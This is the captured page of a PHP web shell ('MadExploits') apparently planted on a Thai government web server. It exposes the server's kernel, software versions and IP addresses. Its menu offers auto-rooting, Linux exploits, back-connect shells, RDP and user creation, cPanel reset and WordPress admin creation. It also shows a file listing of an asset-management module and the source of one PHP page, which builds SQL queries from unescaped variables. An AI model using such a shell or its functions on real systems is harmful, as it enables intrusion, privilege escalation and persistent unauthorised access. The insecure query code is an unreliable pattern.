Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
asset /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
asset.php
89.73
KB
-rw-r--r--
asset_budget_type.php
6.99
KB
-rw-r--r--
asset_building.php
7.37
KB
-rw-r--r--
asset_code_model.php
7.75
KB
-rw-r--r--
asset_company.php
9.95
KB
-rw-r--r--
asset_form_upload.php
4.74
KB
-rw-r--r--
asset_list.php
12.23
KB
-rw-r--r--
asset_method.php
6.91
KB
-rw-r--r--
asset_notification.php
38.37
KB
-rw-r--r--
asset_permission.php
13.12
KB
-rw-r--r--
asset_print.php
9.88
KB
-rw-r--r--
asset_print1.php
8.43
KB
-rw-r--r--
asset_print_lend.php
3.49
KB
-rw-r--r--
asset_print_lend1.php
9.59
KB
-rw-r--r--
asset_print_lend2.php
8.85
KB
-rw-r--r--
asset_print_lendAll.php
3.27
KB
-rw-r--r--
asset_print_lendAll1.php
9.84
KB
-rw-r--r--
asset_print_qrcode.php
10.28
KB
-rw-r--r--
asset_print_qrcode1.php
1.45
KB
-rw-r--r--
asset_report1.php
20
KB
-rw-r--r--
asset_report23.php
20.09
KB
-rw-r--r--
asset_report4.php
19.76
KB
-rw-r--r--
asset_report_to_excell.php
6.54
KB
-rw-r--r--
asset_set.php
8.43
KB
-rw-r--r--
asset_status3.php
85.25
KB
-rw-r--r--
asset_status40.php
85.27
KB
-rw-r--r--
asset_type.php
9.5
KB
-rw-r--r--
index.php
5.76
KB
-rw-r--r--
livesearch.php
2.11
KB
-rw-r--r--
livesearch_notification.php
954
B
-rw-r--r--
manual.php
1.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : asset_print_lendAll.php
<script type="text/javascript" src="css/scrolltop/scrolltopcontrol.js"></script> <?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); //sd page require_once("include/time_inc.php"); $officer=$_SESSION['login_user_id']; if(!(isset($_REQUEST['officer_index']))){ $_REQUEST['officer_index']=""; } //ส่วนหัว echo "<br />"; if(!(($index==1) or ($index==2) or ($index==5))){ echo "<table width='50%' border='0' align='center'>"; echo "<tr align='center'><td><font color='#006666' size='3'><strong>พิมพ์ ใบยืมทรัพย์สินรายชุด/โครงการ/กลุ่ม</strong></font></td></tr>"; echo "</table>"; } echo "<form id='frm1' name='frm1'>"; echo "<table class='myTableGreen'>"; echo "<Tr>"; echo "<Td colspan='5' align='right'>"; //echo "<img src='images/my-icons/print-3.png' width='32' height='32' border='0'> "; echo "<Input Type='submit' name='smb' value='พิมพ์ ใบยืมทรัพย์สินตามที่เลือก' onclick='goto_url_update(1)' class='button'>"; echo "</td></tr>"; echo "<tr> <th>ที่</th> <th>ชุด/โครงการ/กลุ่ม</th> <th>หน่วยงาน</th> <th width=250>จำนวนทรัพย์สิน (รายการ)</th> <Th nowrap><input name=\"allbox\" onClick=\"selectall();\" type=\"checkbox\"> เลือก/ไม่เลือกทั้งหมด</Th> </tr>"; $sql="SELECT * FROM asset_set ORDER BY code "; $dbquery=mysqli_query($connect, $sql); $N='1'; while($result=mysqli_fetch_array($dbquery)){ $code_set=$result['code']; $sql_asset="SELECT company_id, count(id) AS count_set FROM asset_main WHERE code_set like '$code_set' GROUP BY code_set "; $dbquery_asset=mysqli_query($connect, $sql_asset); $result_asset=mysqli_fetch_array($dbquery_asset); $sql_company="SELECT * FROM asset_company WHERE id='$result_asset[company_id]' "; $dbquery_company=mysqli_query($connect, $sql_company); $result_company=mysqli_fetch_array($dbquery_company); if ($result_asset['count_set']!=0){ echo "<tr> <td align='center'>".$code_set."</td> <td>".$result['name']."</td> <td>".$result_company['name']."</td> <td align='center'>".$result_asset['count_set']."</td>"; echo "<td align='center'>"; echo "<input type=\"checkbox\" name=\"id_array[]\" id='id_array' value=\"$code_set\">"; //<a href='modules/asset/main/asset_print_lendAll1.php?person_id=$person_id' target='_blank' alt='ใบยืม $fullname' title='ใบยืม $fullname'> //<img src='images/my-icons/print-3.png' border='0' width='32' height='32'> //</a> echo "</td> </tr>"; $N++; } } echo "</table>"; echo "</form>"; ?> <script language="JavaScript"> <!-- function goto_url_update(val){ if(val==1){ if (confirm("ยืนยันต้องพิมพ์ ใบยืมทรัพย์สิน? \nDo you want to PRINT Lend of Asset?") == true){ callfrm("modules/asset/main/asset_print_lendAll1.php?id_array=&id_array=<?php echo $id_array;?>"); } } } function selectall(){ for (var i=0;i<document.frm1.elements.length;i++) { var e = document.frm1.elements[i]; if (e.name != 'allbox') e.checked = document.frm1.allbox.checked; } } //--> </script>
Close